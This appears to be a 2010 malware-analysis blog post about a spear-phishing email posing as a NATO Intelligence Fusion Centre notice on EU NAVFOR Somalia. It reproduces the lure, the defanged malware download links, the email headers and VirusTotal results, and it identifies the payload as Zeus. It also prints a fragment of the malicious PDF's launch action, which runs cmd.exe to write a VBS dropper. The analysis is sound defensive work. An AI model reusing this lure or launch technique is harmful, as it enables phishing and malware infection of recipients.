Update: Please read detailed analysis of this and associated attacks
Crime or Espionage? by Nart Villeneuve
Intelligence Fusion Centre
In support of NATO
RAF Molesworth, United Kingdom
Unit 8845 Box 300, Huntingdon
CAMBS PE28 0QB
FROM: Intelligence Fusion Centre
SUBJECT: Military operation of the EU
Additional information can be found in the following report:
http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip
> EUROPEAN UNION
> EUROPEAN SECURITY AND DEFENCE POLICY
> Military operation of the EU
> EU NAVFOR Somalia
>
> This military operation, called EU NAVFOR Somalia - operation
> "Atalanta", is launched in support of Resolutions 1814 (2008), 1816
> (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:
> - the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced
> persons in Somalia;
> - the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention
> and repression of acts of piracy and armed robbery off the Somali coast.
> This operation, which is the first EU maritime operation, is conducted
> in the framework of the European Security and Defence Policy (ESDP).
>
>
> More information and background documents available on
> http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip
> and
> http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip
>
> ________________________________________
> PRESS - EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319
Headers
X-VirusChecked: Checked
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
(174.132.255.10) by xxxxxxxxxx
DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
(envelope-from <gnarusm@mail.thecopperstar.
XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail.
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com
X-Env-Sender: gnarusm@mail.thecopperstar.com
X-Msg-Ref: xxxxxxxxxxx
X-StarScan-Version: 6.2.4; banners=-,-,-
X-Originating-IP: [174.132.255.10]
X-SpamReason: No, hits=1.0 required=7.0 tests=BODY_RANDOMQ
Received: (qmail 15068 invoked from network); 26 Aug 2010 13:24:33 -0000
Received: from a.ff.84ae.static.theplanet.com (HELO mail.thecopperstar.com)
(174.132.255.10) by xxxxxxxxxx
DHE-RSA-AES256-SHA encrypted SMTP; 26 Aug 2010 13:24:33 -0000
Received: from gnarusm by mail.thecopperstar.com with local (Exim 4.69)
(envelope-from <gnarusm@mail.thecopperstar.
XXXXXXXXXX; Thu, 26 Aug 2010 08:24:30 -0500
To: XXXXXXXXX
Subject: From Intelligence Fusion Centre to XXXXXXX
From: <ifc@ifc.nato.int>
Message-ID: <E1OocRS-0006Y5-PR@mail.
Date: Thu, 26 Aug 2010 08:24:30 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mail.thecopperstar.com
 174.132.255.10
 Hostname:    a.ff.84ae.static.theplanet.com
ISP: THEPLANET.COM INTERNET SERVICES
Organization: THEPLANET.COM INTERNET SERVICES
Type: Broadband
Assignment: Static IP
Country: United States
State/Region: Texas
ISP: THEPLANET.COM INTERNET SERVICES
Organization: THEPLANET.COM INTERNET SERVICES
Type: Broadband
Assignment: Static IP
Country: United States
State/Region: Texas
http://www.virustotal.com/file-scan/report.html?id=5761e303d7bc027df47b5b01a3e4e8e186eb36d3a4f40956768231ef3bbcac46-1282832496
Submission date: 2010-08-26 14:21:36 (UTC)
Current status: finished
Result: 11 /41 (26.8%)
Avast 4.8.1351.0 2010.08.26 PDF:Risk-A
Avast5 5.0.594.0 2010.08.26 PDF:Risk-A
BitDefender 7.2 2010.08.26 Exploit.PDF-Dropper.Gen
eSafe 7.0.17.0 2010.08.26 PDF.DropperExploit.Gen
eTrust-Vet 36.1.7818 2010.08.26 PDF/Pidief.RU
F-Secure 9.0.15370.0 2010.08.26 Exploit.PDF-Dropper.Gen
GData 21 2010.08.26 Exploit.PDF-Dropper.Gen
Kaspersky 7.0.0.125 2010.08.26 Trojan-Dropper.VBS.Pdfka.b
nProtect 2010-08-26.01 2010.08.26 Exploit.PDF-Dropper.Gen
PCTools 7.0.3.5 2010.08.26 Trojan.Dropper
SUPERAntiSpyware 4.40.0.1006 2010.08.26 -
Symantec 20101.1.1.7 2010.08.26 Trojan.Dropper
Additional informationShow all
MD5 : 8b3a3c4386e4d59c6665762f53e6ec8e
/Type /Action
/S /Launch
/Win /F (cmd.exe)
/P (
/c echo Dim BinaryStream > vbs1.vbs && echo Set BinaryStream = CreateObject("ADODB.Stream")
 -------------------------------------------------
Windows XPSP2 Adobe Reader 9.1 
Quick flash of CMD.exe black window and we are looking at a pretty new icon on the desktop exe.exe
Files created
c:\windows\system32\ntos.exe 28C4648F05F46A3EC37D664CEE0D84A8
same directory as the original file - exe.exe 5fb94eef8bd57fe8e20ccc56e33570c5
And these are the classic signs of old Zeus and this is what it is.
File name:
exe.exe
http://www.virustotal.com/file-scan/report.html?id=33ac66e78d410d03f5644fb1569ea7d28e823561e00b86593d9022f554127c7e-1282847843
3 /41 (7.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
Additional information
Show all
MD5 : 5fb94eef8bd57fe8e20ccc56e33570c5
File name: ntos.exe
http://www.virustotal.com/file-scan/report.html?id=c61fdc96fb7861396d7aa99a26cb6dff3f92aeeccf93d212a8fa3e166adec6aa-1282850806
Submission date: 2010-08-26 19:26:46 (UTC)
Result: 4 /39 (10.3%)
AntiVir 8.2.4.46 2010.08.26 TR/Crypt.XPACK.Gen2
Panda 10.0.2.7 2010.08.26 Suspicious file
PCTools 7.0.3.5 2010.08.26 Trojan.Zbot
Symantec 20101.1.1.7 2010.08.26 Trojan.Zbot
Additional informationShow all
MD5 : 28c4648f05f46a3ec37d664cee0d84a8
 

 
No comments:
Post a Comment